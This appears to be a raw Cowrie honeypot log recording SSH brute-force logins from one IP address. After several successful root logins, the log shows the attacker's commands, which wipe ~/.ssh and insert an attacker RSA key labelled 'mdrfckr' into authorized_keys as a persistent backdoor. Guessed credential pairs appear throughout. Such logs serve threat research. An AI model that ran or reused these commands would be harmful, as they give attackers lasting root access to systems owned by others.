{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:55.414287Z","src_ip":"212.227.235.229","session":"9a2cd581bcd9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:56:56.499129Z","src_ip":"212.227.235.229","session":"9a2cd581bcd9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:56.766275Z","src_ip":"212.227.235.229","session":"9a2cd581bcd9"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:56.768791Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35490,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd7d02d98c7d","protocol":"ssh","message":"New connection: 212.227.235.229:35490 (1.2.3.4:22) [session: dd7d02d98c7d]","sensor":"my-vps","timestamp":"2025-09-09T09:57:01.451405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:57:01.452785Z","src_ip":"212.227.235.229","session":"dd7d02d98c7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:57:01.551927Z","src_ip":"212.227.235.229","session":"dd7d02d98c7d"}
{"eventid":"cowrie.login.failed","username":"dev","password":"111","message":"login attempt [dev/111] failed","sensor":"my-vps","timestamp":"2025-09-09T09:57:01.947686Z","src_ip":"212.227.235.229","session":"dd7d02d98c7d"}
{"eventid":"cowrie.session.closed","duration":31.449628829956055,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:02.403514Z","src_ip":"212.227.125.160","session":"a2be2115338b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:03.049072Z","src_ip":"212.227.235.229","session":"dd7d02d98c7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34242,"dst_ip":"1.2.3.4","dst_port":22,"session":"d31866cd81cf","protocol":"ssh","message":"New connection: 212.227.235.229:34242 (1.2.3.4:22) [session: d31866cd81cf]","sensor":"my-vps","timestamp":"2025-09-09T09:57:23.459104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:57:23.466776Z","src_ip":"212.227.235.229","session":"d31866cd81cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:57:23.714507Z","src_ip":"212.227.235.229","session":"d31866cd81cf"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"changeme","message":"login attempt [postgres/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T09:57:24.784751Z","src_ip":"212.227.235.229","session":"d31866cd81cf"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:26.050985Z","src_ip":"212.227.235.229","session":"d31866cd81cf"}
{"eventid":"cowrie.session.connect","src_ip":"103.107.97.234","src_port":55204,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0598fa5a7c2","protocol":"telnet","message":"New connection: 103.107.97.234:55204 (1.2.3.4:23) [session: b0598fa5a7c2]","sensor":"my-vps","timestamp":"2025-09-09T09:57:33.109105Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d13a34f38d4f","protocol":"ssh","message":"New connection: 212.227.235.229:40502 (1.2.3.4:22) [session: d13a34f38d4f]","sensor":"my-vps","timestamp":"2025-09-09T09:57:39.247977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:57:39.251095Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:57:39.507583Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r5T","message":"login attempt [root/1q2w3e4r5T] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:57:40.589182Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:57:41.131201Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:57:41.133411Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:57:41.135795Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:41.397393Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:57:42.034774Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T09:57:42.037220Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T09:57:42.301368Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:42.304229Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41658,"dst_ip":"1.2.3.4","dst_port":22,"session":"25208eb89a94","protocol":"ssh","message":"New connection: 212.227.235.229:41658 (1.2.3.4:22) [session: 25208eb89a94]","sensor":"my-vps","timestamp":"2025-09-09T09:57:42.557497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:57:42.561759Z","src_ip":"212.227.235.229","session":"25208eb89a94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:57:42.819063Z","src_ip":"212.227.235.229","session":"25208eb89a94"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T09:57:43.855922Z","src_ip":"212.227.235.229","session":"25208eb89a94"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:45.119458Z","src_ip":"212.227.235.229","session":"25208eb89a94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42520,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce6a3363c3ab","protocol":"ssh","message":"New connection: 212.227.235.229:42520 (1.2.3.4:22) [session: ce6a3363c3ab]","sensor":"my-vps","timestamp":"2025-09-09T09:57:45.376006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:57:45.377575Z","src_ip":"212.227.235.229","session":"ce6a3363c3ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:57:45.919288Z","src_ip":"212.227.235.229","session":"ce6a3363c3ab"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:57:46.726920Z","src_ip":"212.227.235.229","session":"ce6a3363c3ab"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:46.989999Z","src_ip":"212.227.235.229","session":"d13a34f38d4f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:57:46.991062Z","src_ip":"212.227.235.229","session":"ce6a3363c3ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44488,"dst_ip":"1.2.3.4","dst_port":22,"session":"1683c8f81b29","protocol":"ssh","message":"New connection: 212.227.235.229:44488 (1.2.3.4:22) [session: 1683c8f81b29]","sensor":"my-vps","timestamp":"2025-09-09T09:57:58.966830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:57:58.971133Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:57:59.239257Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.login.success","username":"root","password":"Password2025","message":"login attempt [root/Password2025] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:58:00.361784Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:58:00.993626Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:58:00.995968Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:58:00.997314Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:01.262067Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:58:01.818408Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T09:58:01.820676Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T09:58:02.100663Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:58:02.103982Z","src_ip":"212.227.235.229","session":"1683c8f81b29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44778,"dst_ip":"1.2.3.4","dst_port":22,"session":"8879efb79977","protocol":"ssh","message":"New connection: 212.227.235.229:44778 (1.2.3.4:22) [session: 8879efb79977]","sensor":"my-vps","timestamp":"2025-09-09T09:58:02.363475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:58:02.373576Z","src_ip":"212.227.235.229","session":"8879efb79977"}
